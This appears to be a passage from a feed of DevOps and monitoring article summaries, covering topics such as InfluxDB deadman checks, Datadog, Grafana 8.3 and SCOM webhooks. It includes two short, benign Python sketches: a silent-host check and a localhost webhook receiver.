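A script like this would typically be wired in through an `[[inputs.exec]]` section of the Telegraf configuration, with the script path listed under `commands` and `data_format` set to `"influx"`; check the plugin documentation for the options available in your Telegraf version.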

TL;DR InfluxDB Tech Tips - Visualizing Uptime with Flux deadman() Function in InfluxDB Dashboards

A common DevOps use case involves alerting when hosts stop reporting metrics, aka a deadman alert. This can be done using the monitor.deadman() Flux function. One can easily create a deadman (or threshold) check in the InfluxDB UI Alerts section or craft a custom task to alert as well. Check out InfluxDB’s Checks and Notifications system post for more details. It’s also possible to use the monitor.deadman() function directly in a dashboard cell.
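
The logic behind a deadman check can be illustrated in plain Python. This is not the Flux `monitor.deadman()` function, only a sketch of the concept: given the last time each host reported, flag the hosts that have been silent for longer than a chosen duration. The `dead_hosts` function and its parameters are hypothetical names for this example.

```python
from datetime import datetime, timedelta, timezone
from typing import List, Mapping


def dead_hosts(
    last_seen: Mapping[str, datetime],
    now: datetime,
    max_silence: timedelta,
) -> List[str]:
    """Return the hosts whose most recent report is older than max_silence."""
    return sorted(
        host for host, seen_at in last_seen.items() if now - seen_at > max_silence
    )


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    reports = {
        "web01": now - timedelta(seconds=30),
        "web02": now - timedelta(minutes=10),
    }
    # With a five-minute threshold, only web02 counts as silent.
    print(dead_hosts(reports, now, timedelta(minutes=5)))
```

The same comparison, run on a schedule, is the core of an alert that fires when a host stops reporting.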

Superfast Troubleshooting of Network User Performance Issues

In the first edition of our Work From Anywhere series, we look at the value of troubleshooting end-user hardware and application issues. Exploring the granular detail that the solution provides, we look at how understanding information about the end user's hardware can help reduce mean-time-to-resolution and increase the productivity of service/support desk teams.
Sponsored Post

Leveraging Your Integration Infrastructure

The investment your organization has made in integration infrastructure (i2) over the years was necessary as the organization and the IT infrastructure grew, but it has likely been considered a necessary evil by senior management. However, that investment can now be leveraged in two important new ways.

Understand the scope of user impact with Watchdog Impact Analysis

Watchdog is Datadog’s machine learning and AI engine, which leverages algorithms like anomaly detection to automatically surface performance issues in your infrastructure and applications. Without any manual setup or configuration, Watchdog generates a feed of Alerts—on anomalies such as latency spikes, elevated error rates, and network issues in cloud providers—to help you reduce your mean time to detection.

Monitor your HCP Vault cluster with Datadog

HashiCorp Cloud Platform (HCP) provides fully managed versions of some of HashiCorp’s most popular offerings, including Vault. With Vault, users have a centralized way to secure, store, and manage access to secrets across distributed systems. HCP Vault handles the day-to-day cluster maintenance, patches, and overall system security, making it easy to deploy a cluster without needing to host or manage your own infrastructure.

Sponsored Post

Observability for Microsoft Teams; How, What, and Why?

As one of the leading enterprise collaboration tools globally, Microsoft Teams helps remote workers come together and stay productive. But while IT already has tools to monitor Teams call quality metrics, the pandemic shifted the organizational landscape, with all of us working remotely from home. Or at least working in a hybrid way! So what does that mean for Teams monitoring now? The shift necessitates a newer Microsoft Teams monitoring strategy that combines synthetics with real user monitoring (RUM) to get a complete, seamless digital experience.

Sponsored Post

The 15 best DevOps tools for 2021 and beyond

The integration of Development and Operations is a powerful recent approach to software development. If you're new to DevOps practices, or looking to improve your current processes, it can be tough to know which tool is best for your team. We've put together this list to help you make an informed decision on which tools should be part of your stack. Read on to discover the 15 best DevOps tools, from automated build tools to application performance monitoring platforms.

What are Webhooks and why do they matter to SCOM?

A Webhook is an API that delivers data from applications when an action or event occurs. When an event is triggered within the source site, it is seen by the Webhook, which collects the data and sends it to the desired application or URL in the form of an HTTP request. Webhooks are also instant, triggering the delivery of data in real time. This makes them faster and easier to implement than other methods, like polling.
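
To show what the receiving side of a webhook can look like, here is a minimal Python sketch using only the standard library. It assumes the sender posts a JSON object containing an `event` key; that payload shape, the `parse_event` helper, and the port number are assumptions for illustration and do not describe SCOM or any specific product.

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer


def parse_event(body: bytes) -> dict:
    """Decode a webhook payload, assumed to be a JSON object with an 'event' key."""
    event = json.loads(body.decode("utf-8"))
    if not isinstance(event, dict) or "event" not in event:
        raise ValueError("payload must be a JSON object with an 'event' key")
    return event


class WebhookHandler(BaseHTTPRequestHandler):
    def do_POST(self) -> None:
        length = int(self.headers.get("Content-Length", 0))
        try:
            event = parse_event(self.rfile.read(length))
        except ValueError:
            # Malformed JSON or an unexpected shape: reject the request.
            self.send_response(400)
            self.end_headers()
            return
        print("received event:", event["event"])
        self.send_response(204)  # Acknowledge with no response body.
        self.end_headers()


def serve(port: int = 8080) -> None:
    """Listen on localhost until interrupted (hypothetical entry point)."""
    HTTPServer(("127.0.0.1", port), WebhookHandler).serve_forever()
```

Because the source system pushes the request as soon as the event occurs, the receiver does no work between events, which is the main contrast with a polling loop.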

Ruby on Rails Application Monitoring with AppSignal

When running and maintaining an application in a production environment, we want to feel confident about the behavior of the application and know when it isn’t working as expected. At the least, we want to track errors, monitor performance, and collect specific metrics throughout the application.

Dealing with Noisy Error Monitoring

Say you've been tasked with monitoring an application, so you set up some alerts to let you know when errors are coming in. The minutes roll by, the errors start coming... ...and they don't stop coming... Oh my, there seem to be quite a few errors coming through. Alerting on each error isn't going to help, so better to report on changes in the error rate instead, right? Not quite. While there's no shortage of vendors that'll sell you on the benefits of error rate alerting, you need to get back to basics first.

Scout APM Announces Release of External Service Monitoring

Scout APM, a leading provider of Application Performance Monitoring (APM), announced the release of Scout External Services Monitoring for Ruby, Python, and PHP applications on December 1, 2021. Scout APM provides developers, engineers, and application administrators software performance insights by delivering key web application performance metrics.

Splunk Mobile for Private Networks

Are you working in a secure environment and want to take advantage of Splunk Mobile and Connected Experiences? Welcome to Private Spacebridge, a version of Spacebridge that you can deploy and manage in your own Kubernetes cluster. Check out this video where Joe, our SR Spacebridge engineer, explains what Private Spacebridge is all about and how it works to get you securely routing mobile traffic through your environment.

Best Practices for Cloud Logging

In our last episode, we covered how to best deploy and use Cloud Monitoring. This week, we answer the most important questions about Cloud Logging - what’s the best way to ingest logs? And how do you centralize logs and manage access? Watch this episode of Engineering for Reliability to learn some best practices for using Cloud Logging. Watch to learn how to keep your services reliable and your users happy.

Grafana 8.3 released: Recorded queries, panel suggestions, new panels, added security, and more

Grafana 8.3 is here! This is an exciting release for Grafana Labs. This release includes the new Candlestick panel, a new visualization suggestions engine, support for AWS Metrics Insights and, for our Grafana Enterprise users, recorded queries. You can get started with Grafana in minutes with Grafana Cloud. Here’s a closer look at the important new features in 8.3.

Customer Journey Map Templates for Enterprises To Improve Customer Experience

Customers no longer base their loyalty on price or product, but on the experience they receive. 86% of buyers are willing to pay more for a great customer experience (according to Super Office). So, to help you get started in actioning what your customers really need, here are 8 templates that address every part of the customer journey.

The 10 top network outages of 2021

Every year the internet experiences numerous disruptions and outages, and 2021 was certainly no exception. This year we documented outages, including multiple government-directed shutdowns, as well as what might be the internet’s biggest outage in history. In this post, I run through 10 of the top outages that we covered in 2021. Needless to say, the world’s network engineers deserve a load of #HugOps in 2021.

Current State of Icinga - OSMC 2021

A couple of weeks ago the Open Source Monitoring Conference (OSMC) took place in Nuremberg, Germany. For over a decade now, the OSMC has provided a platform for monitoring engineers and open source vendors from the field. Icinga has been part of this conference since the beginning. For us the event is a highlight every year, and we take the chance to spend time with the community and give updates about our products. As in previous years, our CEO Bernd summarized the current state of Icinga.

AWS Savings Plan: All You Need to Know

Organizations using the Amazon Web Services (AWS) cloud have traditionally leveraged Reserved Instances (RI) to realize cost savings by committing to the use of a specific instance type and operating system within an AWS region. Nearly 2 years ago, AWS rolled out a new program called Savings Plans, which gives companies a new way to reduce costs by making an advance commitment for a fixed one-year or three-year term.

Serverless security hazards and trends to consider

Fourteen billion dollars – that’s the projected global market size for serverless, which is expected to grow by about 26 percent annually in the next few years, according to the recent Global Serverless Architecture Market report. The fast pace of serverless adoption is hardly surprising because the technology can save significant costs for companies. It can enable them to build and deploy software and digital products without provisioning and maintaining any virtual or physical servers.

Domain-Centric vs. Domain-Agnostic AIOps: What to Use When

AIOps platforms fall into two main categories: domain-centric and domain-agnostic solutions. What are the differences between domain-centric and domain-agnostic AIOps, and why should you choose one type of solution or the other? Read on for guidance on understanding the respective pros and cons of domain-centric and domain-agnostic AIOps.

Data Visualization Made Easy with ReactJS, Nivo and InfluxDB

If a picture is worth a thousand words, then a well-done data visualization is worth a million. The quality of a dashboard can make or break an application. In this tutorial, you will learn how to make high-quality data visualizations easily by using the Nivo charting library with ReactJS. You will also learn how to query data stored in InfluxDB to make your charts dynamic and versatile.

DevOps State of Mind Podcast Episode 3: DevRel and DevOps, Two Peas in a Pod

Joe Karlsson is a senior developer advocate at SingleStore. SingleStore has a highly scalable SQL database that delivers maximum performance for transactional and analytical workloads, all with familiar relational data structures. Joe collaborates with teams across the company to amplify developers' voices and provide support for multiple audiences. Today, we're going to talk about cross-team empathy and why DevRel and DevOps work hand in hand.

5 Reasons Why Your Online Business Needs Website Monitoring

In an age where the internet and eCommerce have such a massive influence on consumers' lives, no business can afford to have an unreliable website. It is as simple as that. Unstable websites cause downtime, repel customers and result in you losing sales. That's why website monitoring is so critical. In this article, you'll learn the specific benefits of constant website monitoring and why it's vital to your business' success.

Solution Brief: Increase Data Visibility and Accelerate Attack Resolution with Exabeam and Cribl LogStream

Traditional security tools struggle to adapt to the new world of cyber threats. To keep up with the growing number of daily threats, understaffed security teams need new cloud-delivered solutions and tactics focused on generating attack resolutions, consistently and repeatedly. Enter Exabeam. Exabeam powers security teams with analytics-driven insights to uncover, investigate, and resolve threats legacy tools may miss.

7 Proven Tips for a Successful Data Center Migration

Many data center migration teams try to mitigate some of the risks and avoid unwelcome surprises through detailed planning and following best practices. However, even with these efforts, data center migrations are so complex that some things still fall through the cracks. In this eBook, we've compiled a list of proven tips based on our experiences and those of our customers when dealing with data center moves to help data center managers tackle often-overlooked challenges and see success before, during, and after the move.